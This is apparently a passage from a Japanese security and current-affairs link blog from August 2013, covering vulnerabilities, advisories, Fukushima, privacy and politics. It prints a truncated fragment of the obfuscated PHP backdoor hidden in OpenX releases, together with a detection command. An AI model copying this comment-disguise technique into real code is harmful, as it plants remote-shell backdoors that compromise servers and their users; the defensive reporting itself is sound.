だと思うのですが(マイナビニュースにはかいてないのでわからない)
・BluetoothのPINが0000である
ことだけが問題になっています。
取り扱い説明書(たとえば「サティスGタイプ」のものだと
http://iinavi.inax.co.jp/pdf/torikousetsu/gcw-1300a-13020.pdf
のP44あたりにあります)
を見るとわかるのですが、
・トイレ側のリモコンで操作しないとペアリング開始できない
・アプリを使い始める前にもう一度確認操作がある(便ふたを開けた状態でアプリ
で操作して認証)
ということで、外部から勝手にペアリングして使用中に操作されるということは
考えにくいと思いますので、これを「脆弱」とするのはどうかと考えます。
当該便器に物理接触できる人なら誰でも無認証でペアリングできるので、 攻撃者はあらかじめペアリングしておくのでしょう。どのような端末とペアリングしているのかを確認する方法は、用意されていないようです。
上記マニュアル p.44 には
他の人がトイレを使っているときに、スマートフォンで操作しないでください。
と明記されているので、INAX も問題の存在には気づいているような。
トロイの木馬化されたオンラインバンキングアプリ、「マスターキー」となるAndroid端末上の脆弱性を突く (トレンドマイクロ セキュリティ blog, 2013.08.05)
カーネルに権限昇格バグが見つかる、Android 4.0〜4.2系では要注意 (日経 IT Pro, 2013.08.07)。「日経コミュニケーション 2013年7月号」からの再録。
出ました。計 13 件のセキュリティ欠陥が修正されています。
リリースノート: Firefox 23.0、 ESR 17.0.8。 Android 版 Firefox 23.0。 Thunderbird 17.0.8。 SeaMonkey 2.20。
セキュリティアドバイザリ: Firefox、 Firefox ESR。 Thunderbird、Thunderbird ESR。 SeaMonkey
ダウンロード:Firefox、 Android 版 Firefox、 Thunderbird、 Firefox / Thunderbird ESR、 SeaMonkey
Firefox 23 では、https に http が混ざったページ (混合コンテンツ) について、 デフォルトではブロックするようになったようです。
混合コンテンツのブロック機能が搭載された「Firefox 23」 (マイナビニュース, 2013.08.07)
もはやコピー機とは言えないレベル。
その不具合の内容とは「スキャンした際に数字が勝手に置き換わる」というもの。(中略) 特に「6が8に置き換わりやすい」(中略)
この不具合には、OCRではなく画像を圧縮する際の規格である「JBIG2」が絡んでいるものとみられており、特定の圧縮レベルと解像度の組み合わせによって発生するとのことです。この件に対してゼロックス社は「工場出荷時の設定を推奨する」としており、低品質・高圧縮のモードを利用しないように呼びかけています。
設定で回避できる模様です。
関連: JBIG2 (Wikipedia)
》 オンラインで不正送金狙う「MITB攻撃」の防ぎ方 (日経 IT Pro, 7/16〜18)。Man in the Browser 攻撃。
》 狙われる個人情報 Androidアプリに潜む危機 (日経 IT Pro, 7/29〜8/2)
》 法制審は、なぜこの声を聞かないのか〜可視化を巡って冤罪被害者たちは語る (江川 紹子 / Yahoo, 8/4)
6月に結成された市民団体「なくせ冤罪えんざい!市民評議会」が法制審に提出した要請書は、厚労省事件での反省を踏まえて適正な司法の実現を目指して設立されたと思っていた法制審特別部会の議論が、「警察、検察、裁判所など各出身母体の権限の温存や拡大を第一義的モチベーションとする意見の応酬」になっていることに対する失望感を表明。冤罪被害者の声を聞き取りを行い、これまでの議論を見直すように求めた。
合わせて、再審無罪が確定した東電OL事件のゴビンダさんや布川事件の桜井昌司さん、杉山卓男さんら冤罪当事者ら8人も要望書を提出。全面可視化や検察官の手持ち証拠全ての開示を求めるその要望書にも、法制審に対する落胆が記されている。
ハッカー祭典、米政府にNO NSA問題で不信感 (朝日, 8/3)
プリウスもハッキングされる危険性、専門家が運転中の車へのハック例を発表し注意を呼びかける【動画】 (朝日 / ハフィントンポスト, 8/5)
ハッカーや元政府幹部が座談会 米政府の個人情報収集 (朝日, 8/6)
[DEFCON21] 如何にしてミニクーパーをハッキングするか 〜 自動車のCANメッセージのリバースエンジニアリング (Scan NetSecurity, 8/5)
》 アップル、他社製アダプタの有償交換を発表 感電事故報告受け (AFPBB, 8/6)。$10 で正規品と交換だそうで。
》 ネット依存取材から見えたこと (NHK, 8/3)、ネット依存の中高生、51万人…睡眠に悪影響 (読売, 8/2)
》 欧州で相次ぐ列車事故の背景は (NHK, 8/2)
フランスでは世界に誇る高速鉄道「TGV」の路線延長を求める声が地方都市に多く、歴代の政権も政治的な思惑もあってこうした要望に優先的に応えてきた経緯があります。
こうしたなか、TGVの整備に多額の予算がつぎ込まれる一方で、今回事故を起こしたような在来線の改修がおろそかになってきたのではないかという指摘が出ているのです。
》 海自最大護衛艦「いずも」進水 (NHK, 8/6)。22DDH の件。基準排水量 19,500 トン、満載排水量 27,000 トンもあるのに「DDH = ヘリコプター塔載駆逐艦」って呼ぶの、いいかげんやめようよ。
》 インターネット定点観測レポート(2013年 4〜6月) (JPCERT/CC, 8/5)
2 注目された現象
【53/UDP宛のパケットの観測】
今、核兵器の非人道性を踏まえ、その廃絶を訴える国が着実に増加してきています。また、米国のオバマ大統領は核兵器の追加削減交渉をロシアに呼び掛け、核軍縮の決意を表明しました。そうした中、日本政府が進めているインドとの原子力協定交渉は、良好な経済関係の構築に役立つとしても、核兵器を廃絶する上では障害となりかねません。
》 米「投下に正当性」は「うそ」 O・ストーン監督が来訪 (東京, 8/6)、オリバー・ストーン監督、広島を初訪問 「『原爆投下が終戦を早めた』は米国の神話。全くのうそだ」 (ハフィントン・ポスト, 8/6)。関連:
今週から「オリバー・ストーン」シリーズ一挙再放送! (NHK BS世界のドキュメンタリー, 8/5)
オリバー・ストーンが語る もうひとつのアメリカ史 (早川書房)
》 沖縄キャンプ・ハンセンで HH-60 が墜落、乗員 1 名死亡
HH-60 ペイブ・ホーク (ウィキペディア)
沖縄で米軍ヘリ墜落 1人不明 住宅地から2キロ (東京, 8/6)
米軍ヘリ墜落 くすぶる火、白煙 現場近くには水源ダム (東京, 8/6)
米軍が同型ヘリの飛行停止 墜落事故、遺体発見 (日経, 8/6)
米軍 同型ヘリの運用当面停止 (NHK, 8/6)
米軍 オスプレイ追加配備延期 (NHK, 8/6)
「原因究明、再発防止」と言っても、ほとんど丸焼けだからなあ……。
(参院の注目新人)「ブラックじゃない」 渡辺美樹氏 (朝日, 8/2)
「5年前に1人の新入社員が労災によって自殺したことは事実だ。会社をあげて命がけの反省をしている。
ワタミ「反省」を口にするなら なぜ一度も会わないのか (日刊ゲンダイ, 8/5)
「娘の過労死認定後、渡辺氏は一度も会おうとしません」と打ち明けるのは、08年6月に自殺した森美菜さん(当時26)の父・豪さんだ。
豪さんが渡辺に面談を求めると、ワタミ側は「1回だけで、録音はしない。労組関係者を同席させない」と身勝手な条件をつけたという。反省しているなら遺族に何度も会うのが当然だろう。豪さんは「1回で真相を解明できるはずがない」と考えたが、ワタミ側は条件を取り下げず、いまだに面談は行われていない。
これが「命がけの反省」の実態ですか。
「black じゃなくて true black です」とかいうネタなのだろうか。
》 ユニクロの苦悩〜過去最高益の裏で進む国内事業の採算悪化、社員退職続出で疲弊する現場 (Buziness Journal, 8/3)
》 復興庁:被災者支援 先送り密議 暴言ツイート裏付け (毎日, 8/1)、宙に浮く子ども被災者支援法の推進を 地方議員が連携 (NHK, 8/2)
》 世界一、日本一の事業を次々と放出したNEC、 玉ねぎの皮を剥いていったら最後に何が残るのか? (JBpress, 8/6)
》 Amazonのジェフ・ベゾスCEO、Washington Postを2億5000万ドルで買収 (ITmedia, 8/6)
》 名大でElsevier社刊行学術誌の包括契約廃止が検討される (slashdot.jp, 8/5)。金の切れ目が縁の切れ目。
》 実写版『機動警察パトレイバー』撮影風景? 実物大イングラム (押井守 情報サイト 野良犬の塒, 8/3)
オープンソースの広告配信サーバー OpenX の正規配布ファイルには、2012.11 以降、remote から任意の PHP コードを挿入・実行可能なバックドアが含まれていた。zip、tar.gz、tar.bz2 のアーカイブが配布されているが、全てにバックドアが入っていたそうで。
バックドアの有無は、次のコマンドで確認できるそうだ。
find . -name \*.js -exec grep -l '<?php' {} \;
出力があった場合、そのファイルにはこんなふうにコメント偽装された PHP コードが含まれている模様:
this.each(function(){l=flashembed(this,k,j)}<?php /*if(e) {jQuery.tools=jQuery.tools||{version: {}};jQuery.tools.version.flashembed='1.0.2'; */$j='ex'./**/'plode'; /* if(this.className ...
これが動くと、外部から zip ファイルを取得し、PHP シェルを自動設置するそうで。
開発元からの正式な案内は、まだ出ていないみたい。
関連:
Important Update for OpenX Source 2.8.10 Users (OpenX Blog, 2013.08.06)。修正版 OpenX Source v. 2.8.11 がリリースされました。
OpenX Security Advisory, 2013/8/6 (OpenX, 2013.08.06)
OpenX ad servers "pre-compromised" - official distro contained remote code backdoor (Sophos, 2013.08.07)
上記↑した PHP コード部分が avast にひっかかり、PHP:BackDoor-BG [Trj] と判定されるそうです。yuu さん、hue @notwobad さん、竹本さん情報ありがとうございます。
Apple 社、充電器から iPhone がハッキングされる脆弱性を修正へ (Sophos, 2013.08.05)
Tor匿名化サーバに不正コード混入、捜査当局が容疑者割り出しに利用か (ITmedia, 2013.08.06)
》 シリア情勢(ゴラン地区のイスラエル司令官のみた情勢変化) (中東の窓, 8/2)
What disrupts the EU's 'factory settings'? (TODAY'S ZAMAN, 7/29)
EU外相、エジプトのモルシ前大統領と面会 (ロイター, 7/30)
アルカイダ指導者のエジプトに関する発言 (中東の窓, 8/3)。アイマン・ザワヒリ。
エジプトのクーデターはキリスト教徒、世俗主義者、軍が、外国の金と米国の振り付けで行ったもので、いくら民主的な選挙で大統領と議会が選ばれても、イスラムの敵は暴力で対抗するので、選挙を通じてのイスラム的国家の樹立は不可能であることを証明した。
アルカイダとしては、当然そう来るわな……。
エジプト軍:シナイ巡り前政権に反感…報道官インタビュー (毎日, 8/5)。エジプト軍報道官のアフマド・アリ大佐にインタビュー。
》 大物ポーカープレイヤーが Android 詐欺の大勝負に負ける (シマンテック, 8/2)。コーエイプランニングの件。
》 【画像集】「ヤバイどす!」ゲリラ豪雨の京都駅構内が水没状態に!一部空間が封鎖され、警察も出動 (NAVER まとめ, 8/5)。PORTA 地下街がたいへんだったようで。
》 ラーメン店員が店の冷凍庫でソーセージをくわえた写真、Twitterに 「丸源ラーメン」が謝罪 (ITmedia, 8/5)、また炎上……今度は丸源ラーメンが謝罪 調理前のソーセージをくわえてTwitter投稿 (ねとらぼ, 8/5)、今度は『丸源ラーメン』でバイトが不適切行為!会社速攻謝罪で店舗営業停止 (秒刊 SUNDAY, 8/5)。どうしてこういうことするかなあ……。
》 クローズアップ2013:津波2年5カ月、宮城・大川小 進まない検証、不信増幅 (毎日, 8/5)、大川小検証委に訂正要求へ 遺族ら (産経, 8/4)
》 脱法ハウス:増える女性専用…元住人「低収入、親頼れず」 (毎日, 8/5)。劣悪な一方で、ここにしか入れないという現実。
》 田代政弘元検事、不起訴 (最高検)。 身内の恥は全力で守ります!
虚偽捜査報告 田代元検事 再び不起訴 (東京, 8/1)
陸山会捜査報告書:田代元検事を再び不起訴処分に 最高検 (毎日, 7/31)
検察側「安堵」「組織に問題」 告発者「信頼回復不可能に」 (産経, 7/31)
田代再不起訴:ついに検察は最後の誇りも捨てましたね (八木啓代のひとりごと, 7/31)
》 無人偵察機「ファルコ」、国連PKOに初導入へ (読売, 8/2)、 Selex ES Falco (Wikipedia)
》 竹熊健太郎氏 『業界関係者が横書きに反対する理由』 日本漫画の海外普及について (togetter, 4/22)。結果として、竹熊案 & 竹熊氏がいかに駄目かというまとめになっている。
》 憲法改正はナチスに学べ by 麻生副総理 (撤回はしたけれど)
風知草:ドイツ史に学ぶこと=山田孝男 (毎日, 8/5)。ばっさり。
麻生はヒトラーの信奉者ではない。毒舌で満座を沸かせたいというウケ狙いの欲にとらわれ、一知半解の知識を振り回して墓穴を掘った。事の本質はそれに尽きると私は思う。
麻生の最大の誤解は、ヒトラーによる事実上のワイマール憲法改正が、現代日本と同質の議会手続きで行われたという思い込みにある。史実は違う。
》 著作権による保護は本を普及させず逆に「消失」させている (gigazine, 8/2)。そもそも著作権って、普及させるためのものではないよね。
》 東電の汚染水対策がどう変遷してきたか:ハッピーさんの見解 (togetter, 8/4)。ポイントはここかな:
続9:オイラが考える東電シナリオが崩れた最大の要因はアルプスだと思うんだ。当時の東電は、アルプス稼働日を基準にして常に汚染水タンクの計画と工事発注をしてた。アルプスが稼働すると汚染水タンクは沢山造っても余って無駄になるからね。
— ハッピー (@Happy11311) August 4, 2013
「ALPS、スケジュール通り稼働」が単一障害点だったと……。 しかしそれに失敗したと。
汚染水関連:
海側遮水壁の上部2mほどは、遮水できていないので汚染水は海洋へ出続け。(おしどりマコ) (NO BORDER, 8/2)
衝撃! 福島原発第一の怖い現状! (NAVER まとめ, 8/3)
「汚染水漏れ口放置」 東電「技術的に困難」と反論 (日本報道検証機構, 8/3)
福島第一 地下水位上昇で流出対策検討 (NHK「かぶん」ブログ, 8/1)
汚染地下水 東電に対策前倒し求める (NHK「かぶん」ブログ, 8/3)
》 ツイッター、攻撃的投稿の禁止を明確化 (ウォール・ストリート・ジャーナル日本版, 8/4)、 Twitter、攻撃的ツイート禁止のルール改訂 Twitter.comへの「報告ボタン」設置も約束 (ITmedia, 8/5)
関連: 脅迫書き込み「放置」、ツイッター社追及へ…英 (読売, 8/1)
》 米、極秘核施設を同盟国に開示 核の傘、不信拭う狙い (朝日, 7/30)
複数の日米政府関係者らが明らかにした。2010年2月から始まった、核の傘を巡る政策などを話し合う日米拡大抑止協議の一環として、日本の外務、防衛両省幹部が昨年5月と今年4月、核戦力に関連した米軍基地計3カ所を訪れた。
関連: ミサイル発射ボタンまで 米の極秘核施設開示 (朝日, 7/30)
》 敵基地攻撃能力「北朝鮮への対抗手段」 防衛相が明言 (朝日, 8/4)
phpMyAdmin 3.5.x / 4.0.x に欠陥。特定のブラウザにおいて clickjacking 攻撃の影響を受ける。CVE-2013-5029
phpMyAdmin 4.0.5 で修正されている。3.5.x では対応できないそうだ。
関連:
Android端末の脆弱性を悪用した不正アプリ見つかる (so-net セキュリティ通信, 2013.08.01)
Master Key Android Vulnerability Used to Trojanize Banking App (trendmicro blog, 2013.08.02)
そもそも、なぜわざわざ Android から制御できる必要があるんだろう……。 と思って スマートフォンリモコン (LIXIL) を見ると、「日々の排便状況をカレンダー上に記録して、健康管理に活用いただけます」というのが、当該リモコンアプリのウリな機能らしい。
My SATIS (Google play) を見た限りでは、まだ fix されていない模様。 というか、これ、トイレ側の対応も必要だよね……。
うえのさんから (情報ありがとうございます)
表記の記事、ニュースソースは
https://www.trustwave.com/spiderlabs/advisories/TWSL2013-020.txt
だと思うのですが(マイナビニュースにはかいてないのでわからない)
・BluetoothのPINが0000である
ことだけが問題になっています。
取り扱い説明書(たとえば「サティスGタイプ」のものだと
http://iinavi.inax.co.jp/pdf/torikousetsu/gcw-1300a-13020.pdf
のP44あたりにあります)
を見るとわかるのですが、
・トイレ側のリモコンで操作しないとペアリング開始できない
・アプリを使い始める前にもう一度確認操作がある(便ふたを開けた状態でアプリ
で操作して認証)
ということで、外部から勝手にペアリングして使用中に操作されるということは
考えにくいと思いますので、これを「脆弱」とするのはどうかと考えます。
当該便器に物理接触できる人なら誰でも無認証でペアリングできるので、 攻撃者はあらかじめペアリングしておくのでしょう。どのような端末とペアリングしているのかを確認する方法は、用意されていないようです。
上記マニュアル p.44 には
他の人がトイレを使っているときに、スマートフォンで操作しないでください。
と明記されているので、INAX も問題の存在には気づいているような。
Firefox ESR 17 に任意のコードの実行を許す 0-day 欠陥があり、それが Tor ネットワーク上での児童ポルノ頒布者の検挙に使われたのでは、という話みたい。 Firefox 22 にはこの欠陥はない模様。
FBI bids to extradite 'largest child-porn dealer on planet' (independent.ie, 2013.08.03)
Bug 901365 - Firefox 0-day found on Tor .onion service (reported on Reddit) (mozilla.org, 2013.08.04)
Investigating Security Vulnerability Report (Mozilla Security Blog, 2013.08.04)。Daniel Veditz 氏によれば、この欠陥は 0-day ではなく MFSA 2013-53 であり、Firefox 22 および Firefox ESR 17.0.7 で修正されている、 という。
Tor匿名化サーバに不正コード混入、捜査当局が容疑者割り出しに利用か (ITmedia, 2013.08.06)
関連:
Tor Browser attacked, users should update software immediately (EFF, 2013.08.06)
Tor does not provide automatic security updates. Instead, the Tor Browser currently requires users to manually download and install the update of the Tor Browser Bundle. The Tor Project is working on a fix for this, and this attack highlights the importance of allowing users to auto-update.
Tor Browser、自動アップデート機能はまだないのですね。
Tor の匿名性が攻撃される (シマンテック, 2013.08.07)
》 ネットバンキング被害 過去最悪に (NHK, 8/4)。7月末までで 3億6000万円、と警察庁が発表したらしい。関連:
ネットバンキング不正送金被害、最悪の3億6000万円に (産経, 8/3)
衝撃・狙われる日本 ネット銀の不正送金被害、新種ウイルス感染の96%が国内のパソコンだった (産経, 8/3)。 どうやら、オンライン銀行詐欺ツール「Citadel」:日本での被害増加を確認、国内で2万台以上の感染 (トレンドマイクロ セキュリティ blog, 7/23) の件みたい。 Citadel = Zbot。
》 米国、同性婚配偶者にビザ発給 世界222箇所で受け付け (みやきち日記, 8/3)
》 Wordの履歴機能で、自民党が変えた憲法を見てみる (editorium, 8/4)
》 データ販売拒否 9400件余 (NHK, 8/3)。Suica 方面。
》 データサイエンティストが要らなくなる日が来るかもしれない (IT Leaders, 8/1)
今のデータサイエンティストは、コンピュータが誕生したばかりの頃にいた「配線担当」のような存在だと思うんです。(中略)
大量のデータを扱うためのツールが揃ってきました。ただ、まだ未成熟な段階なので、使う側がお守りをしてやらないといけない。例えば、ログデータを整形したり、プログラムのパラメータを設定したりといった作業が伴う。そのために、さまざまなスキルが必要になるのです。でも、そうした作業が自動化できたらどうでしょうか。プログラミング言語の発達によって、配線担当の仕事が不要になったのと同様に現在のデータサイエンティストの仕事のうちかなりの部分がソフトウェアで置き換えられるんじゃないの?という話です。
》 土屋アンナ問題に関する著作権的考察:出版社の立場について (栗原潔のIT弁理士日記, 8/1)
》 英、原爆使用に同意 広島投下の1カ月前 公文書で裏付け (産経, 8/4)
英国が政府として日本への原爆使用に公式に同意したのは、第2次大戦末期の45年7月4日にワシントンで開かれた原爆開発協力をめぐる合同政策委員会(CPC)の会合。
》 私たちが、すすんで監視し、監視される、この世界について リキッド・サーベイランスをめぐる7章 (青土社)。ジグムント・バウマン+デイヴィッド・ライアン。 関連:
ジグムント・バウマンについて (ものろぎや・そりてえる, 2011.11.19)
デイヴィッド・ライアンの監視社会論、訳書第3弾 (ウラゲツ☆ブログ, 2010.10.10)
》 特定のベンチマークアプリでのみリミッターを解除するSamsung Galaxy S4 (slashdot.jp, 8/2)。ベンチマーク対策って、あいかわらやってるんですね。
》 丹後半島に新米軍施設 ミサイル警戒レーダー配備へ (朝日, 8/1)。AN/TPY-2 レーダー配備の件。 日本配備2基目のXバンドレーダー「AN/TPY-2」は京都の丹後半島へ (週刊オブイェクト, 2/24) も参照。
》 NTT Comのサーバに不正アクセス、Webアプリサーバの脆弱性を突かれた可能性 (@IT, 7/24)。ODN ID の件、痒い所に手が届く高橋睦美記者の記事。 (今気づいた)
NTT Comが不正アクセスに気付いたのは7月23日。(中略) NTT Comの調査によると、最初に不正アクセスを受けたのは7月17日で、不審なプログラムが設置されたのは翌18日。
侵入されてから 6 日間気がつかなかったんですね。 公式アナウンスにはそんな情報はなかったわけで。
》 20回目の完工延期…六ヶ所村・核再処理工場 (読売, 7/31)。あいかわらずこんなていたらく。原発輸出なんてレベルじゃねーよ。自民党は足元を見ろ。
》 Twitter transparency report shows growing government demand for data (Washington Post, 7/31)、 Working to increase #transparency: Our latest report (Twitter, 7/31)
米NSAアレキサンダー長官、セキュリティー会議「ブラックハット」で自らの監視行為を弁護 (techcrunch, 8/2)
NSA Director accused of lying to Congress at Black Hat USA 2013 keynote (ZDNet, 7/31)
NSA Director Alexander Black Hat USA 2013 Keynote: Gallery (ZDNet, 7/31)
Black Hat USA 2013: Day One, In Pictures (ZDNet, 8/1)
Best of Show, Black Hat USA 2013 Vendors and Sponsors (ZDNet, 8/2)
アップル、充電器経由でマルウェアがアップロードされる脆弱性を「iOS 7」で対応へ (CNET, 8/1)、 Researchers reveal how to hack an iPhone in 60 seconds (ZDNet, 7/31)
Apple 社、充電器から iPhone がハッキングされる脆弱性を修正へ (Sophos, 8/5)
Blackhat 2013 - Keynote NSA's Alexander Provides Details, and Talks on Embedded and Low Level Attacks (Kaspersky, 8/1)
Blackhat USA 2013 Day 2 - Double Fetch 0day, ICS/SCADA, and Remembering Barnaby Jack (Kaspersky, 8/2)
Black Hat: 新しいマルウェア自動検出システムの詳細を研究者が発表 (シマンテック, 8/2)
》 Facebook users worldwide (minus some mobile phones) now getting secure web browsing by default (Sophos, 8/2)、 Facebook、HTTPS接続を全ユーザーの標準設定に (Internet Watch, 8/1)
》 How To: Setting Up Google's Two-Factor Authentication In Linux (SANS ISC, 8/1)。Linux で Google 2 段階認証を使う方法。
》 $80 million yacht hijacked by students spoofing GPS signals (Sophos, 7/31)、 偽のGPS信号で豪華ヨットの乗っ取りに成功、米テキサス大が実験 (ITmedia, 8/1)
》 スマートホームのハッキング (シマンテック, 8/1)
》 ハッキングで自動車が自在に操られる危険性 (シマンテック, 8/2)
》 米国:圧力釜はテロリズムの疑い (ロシアの声, 8/2)。自宅で圧力釜について検索していたら、いきなり警察のテロ対策チーム 6 人がやってきた話。実は、検索に使っていたのは夫の仕事用の PC で、警察へは夫の雇用主から連絡が行ったみたい。
pressure cookers, backpacks and quinoa, oh my! (medium.com)。オリジナル記事。
My family's Google searching got us a visit from counterterrorism police (Guardian, 8/1)。Guardian に転載されたもの。
Employer Tipped Off Police To Pressure Cooker And Backpack Searches, Not Google (techcrunch, 8/1)
アップル、充電器経由でマルウェアがアップロードされる脆弱性を「iOS 7」で対応へ (CNET, 2013.08.01)。十分に信頼できる充電器だけを使いましょう。
シマンテック方面
SYM13-008: Security Advisories Relating to Symantec Products - Symantec Web Gateway Security Issues (Symantec, 2013.07.25)。 Symantec Web Gateway 5.1.0 以前に OS コマンドインジェクション、SQL インジェクション、XSS などの欠陥。 Symantec Web Gateway 5.1.1 で修正されている。 CVE-2013-1616 CVE-2013-1617 CVE-2013-4670 CVE-2013-4671 CVE-2013-4672 CVE-2013-4673
SYM13-009: Security Advisories Relating to Symantec Products - Symantec Backup Exec Multiple Issues (Symantec, 2013.08.01)。Symantec Backup Exec 2010 R3、 2012 に、Linux Agent で heap overflow、管理コンソールで XSS など複数の欠陥。 Symantec Backup Exec 2010 R3 SP3、2012 SP2 で修正されている。 CVE-2013-4575 CVE-2013-4576 CVE-2013-4577 CVE-2013-4578
VMSA-2013-0009: VMware ESX and ESXi updates to third party libraries (VMware, 2013.07.31)。OpenSSL、libxml2、GnuTLS、Kernel の更新。
Multiple Cisco Products OSPF LSA Manipulation Vulnerability (Cisco, 2013.08.01)。CVE-2013-0149
ICSA-13-213-02: Siemens WinCC TIA Portal Multiple Vulnerabilities (ICS-CERT, 2013.08.01)。WinCC (TIA Portal) V11 / V12 に 2 つの欠陥。 XSS (CVE-2013-4911)、 信頼されないサイトへの URL リダイレクション (CVE-2013-4912)。 V12 SP1 で修正されている。V11 用の fix は開発中。
SA-CONTRIB-2013-061 - Flippy - Access Bypass (Drupal, 2013.07.31)
Apple 社、充電器から iPhone がハッキングされる脆弱性を修正へ (Sophos, 2013.08.05)
MS13-054 - 緊急: GDI+ の脆弱性により、リモートでコードが実行される (2848295) の Office 2010 用の更新プログラムが再リリースされた。
V.1.1 (2013/08/02):このセキュリティ情報ページを更新し、Microsoft Office 2010 用の更新プログラム 2687276 での検出を変更したことをお知らせしました。セキュリティ更新プログラムのファイルへの変更はありません。システムを正常に更新済みのお客様は、措置を講じる必要はありません。また、よく寄せられる質問 (FAQ) に項目を追加して、Microsoft Office 用の更新プログラムが適用される可能性がある構成について説明しました。
FAQ の、これかな:
影響を受けるソフトウェアとして記載されている Microsoft Office 2010 を実行しています。なぜ、更新プログラム 2687276 が提供されないのですか?
更新プログラム 2687276 は、サポートされているエディションの Windows XP または Windows Server 2003 上で Microsoft Office 2010 を実行しているシステムのみに提供されます。その他のサポートされている構成には、脆弱性の影響を受けるコードが存在しないため、この更新プログラムは適用されません。
》
「経験したことのないバルス」 気象庁、大バルス警報を発令
(虚構新聞, 8/2)。結果は 58475 tweet/s (世界新記録)
143,199 tweet/s (世界新記録)
だったそうで、本当に「これまでに経験したことのないようなバルス」になっちゃいましたとさ。関連:
悲報『バルス』前に2chサーバ陥落!ツイッター・ニコニコは健在 (秒刊SUNDAY, 8/2)
「バルス!」の瞬間にTwitterへ一気に流れてきたネタ画像まとめ (gigazine, 8/2)
虚構新聞さん:
【社主】現在いつもの10倍を超えるアクセスが殺到中。まさか本紙サーバーが陥落するとは…。
— 虚構新聞速報/編集部便り (@kyoko_np) August 2, 2013
関連: 「バルスで世界記録更新、毎秒5万8475ツイート」と出所不明の情報拡散 Twitter「当社が発表したものではなく、推定値とも違う」 (ITmedia, 8/3)。すいません俺もひっかかりました。_o_
》 【NAVER】NAVER会員情報への不正アクセスに関するお知らせ(続報) (LINE, 8/2)
8月2日、不正アクセスを行った人物を特定し、不正アクセスされた会員情報の不正使用、第三者への提供等の痕跡が一切無いことを確認いたしました。
今回の不正アクセスは日本国外の人物によって行われたのもので、弊社と現地警察とで連携し、不正アクセスを行った人物の特定に至りました。
また、本人の自供および現地警察と弊社の技術スタッフによる検証の結果、169万2,496件のNAVERアカウント情報(Eメールアドレス、ハッシュ化されたパスワード、アカウント名(ニックネーム))は弊社スタッフ立会いのもとで削除され、かつ、不正ログインによるアクセス、データの改ざん、第三者に提供した痕跡などは一切確認されませんでした。
これはすごい話だな……。よく「現地警察」が素早く動いてくれたなあ。 NAVER ゆかりの「現地警察」だったりするのかな。
なお、本件に関わらず、複数のサイト・サービスで同じパスワードを使用せず、定期的にパスワードの変更を行うことをお薦めいたします。
「定期的にパスワードの変更を行うことをお薦め」するサイトというのは、言い替えると、定期的にヤラレてパスワードが流出する可能性が大きいと自ら認めている、ということだよなあ。と思って、 LINEのお客様お問い合わせ窓口に質問してみた。
》 [続報]オプトアウト受付は既に8800件、Suica履歴提供の仕組みをJR東日本に改めて聞く (日経 IT Pro, 8/2)。Suica の件、浅川記者による続報。たいへん興味深い。
——誕生日を年単位でなく月単位で渡したり、利用日時を秒単位で渡したりと、引き渡すデータの粒度が必要以上に細かい印象を受ける。
大枠でいえば、JR東日本は氏名や電話番号といった個人識別情報を取り除いたデータを日立製作所に渡し、日立製作所の側で統計処理を行っていただく役割分担になっているので、あえてJR東日本でそれ以上の処理は行っていない。
例えば、「利用者は数百人と少ない駅のデータはレポートから除く」「早朝・深夜で利用者が少ない時間帯のデータは除く」といった匿名化処理は日立製作所が行っている。
うへえ。Suicaに関するデータの社外への提供について (JR 東日本, 7/25) の最終ページにおいて「分析レポートに必要な最低限の情報のみのデータをファイルとして切り出しています」と書いてあるから、 JR 東で粗集計した上で当該データを除外してから日立に渡してるのかと思ったら、そうじゃないんだ。 日立に全データ渡ってるんだ。これはひどい。
——履歴データの提供や、SuicaIDのID変換方式を切り替える頻度は。
まず過去2年半分のデータを一括で日立製作所に渡して、その後は月ごとに1カ月分の最新データを渡すという形をとっている。ID変換についてはデータを引き渡すたび、つまり1カ月単位で関数のキーを変え、キーをその都度廃棄する。
(中略)
今回、オプトアウトの告知を行うにあたり、過去2年分半のデータもオプトアウト対象にするため、日立製作所には当初渡したデータを廃棄してもらうことにした。
(中略)
——過去2年半分のデータを一括で渡したということは、変換済IDも2年半にわたり同一のものだったのか。であれば、プライバシーへのインパクトは相対的に大きくなる印象だ。
当初渡していたデータは、確かにそうなっていた。今回、改めて2年半分のデータを渡し直すに当たり、1カ月単位でIDの変換キーを切り替えるように処理しなおす予定だ。
「変換済IDも2年半にわたり同一のものだった」。うへえ。
》 2013 年版警察白書公開。各社のフォーカスが違っていて興味深い。
警察白書 子ども守る対策強化を強調 (NHK, 8/2)
いじめ、ストーカー…子供・女性被害者対策徹底特集 警察白書 (産経, 8/2)
子供への脅威、誘拐より痴漢より「いじめ」 警察白書 (朝日, 8/2)
不審アクセス5分に1回 警察白書、サイバー脅威に警鐘 (日経, 8/2)
刑法犯の被害、摘発とも高齢者増 13年版警察白書 (中国新聞, 8/2)
警察白書:被害者、摘発ともに高齢者多く 刑法犯罪 (毎日, 8/2)
オリジナルはこちら (オンラインには、まだ要約版だけです):
平成25年警察白書 (警察庁)
》 BPO「関西テレビ 放送倫理に違反」 (NHK, 8/2)、関西テレビ『スーパーニュースアンカー』 「インタビュー映像偽装」に関する意見 (BPO, 8/2)。スーパーニュースアンカー 2012.11.30、偽装映像を使用。
委員会は、社内でのチェックが機能せず問題のインタビュー映像を放送してしまったこと、問題発覚後これを視聴者に伝えない決定をしたことの2点について、放送倫理に違反すると判断した。そのうえで、今回の問題の本質は、関西テレビがいう「不適切な映像表現」ではなく、テレビを信じてモザイク映像の放送を容認している視聴者の信頼を裏切るような「許されない映像」が放送されたことにあると指摘した。
》 「自動車ハッキング論文」:英法廷が差し止め(WIRED.jp) (日経 IT Pro, 8/2)。Megamos Crypto をクラックしたそうで。「Megamos Cryptoは、クルマのイグニッションスイッチを入れるキーのID証明に使われているシステムで、複数の高級車ブランドで採用されている」
》 憲法の視点を忘れてはいけない〜証拠の「目的外使用」を巡って (江川 紹子 / Yahoo, 7/29)、螺旋刑訴法 (壇弁護士の事務室, 7/31)。 NHK 大阪地検激怒で「取り調べ可視化」番組を放送延期した の件。代理人団の筆頭、滝井繁男弁護士にインタビュー。
——なぜ、今回の代理人に?
この話を聞いた時、最高裁時代の同僚泉さん(=泉徳治弁護士※注1)が言っていたことを思い浮かびました。彼がアメリカに行った時に、「日本の裁判所は、憲法より法律を重視する傾向があるんじゃないか」と言われたそうなんです。つまり、まず法律を見て、合理性があれば合憲と解釈してしまう傾向がある、と。
今回の検察の対応も、刑事訴訟法の条文だけ見ていて、憲法を見る目が全く欠落しています。言論の自由、表現の自由、知る権利といった憲法の視点がまったくない。そこに危機感を覚えました。
》 第3次大戦の女王スピーチ 訓練で作成、英文書館公開 (産経, 8/1)
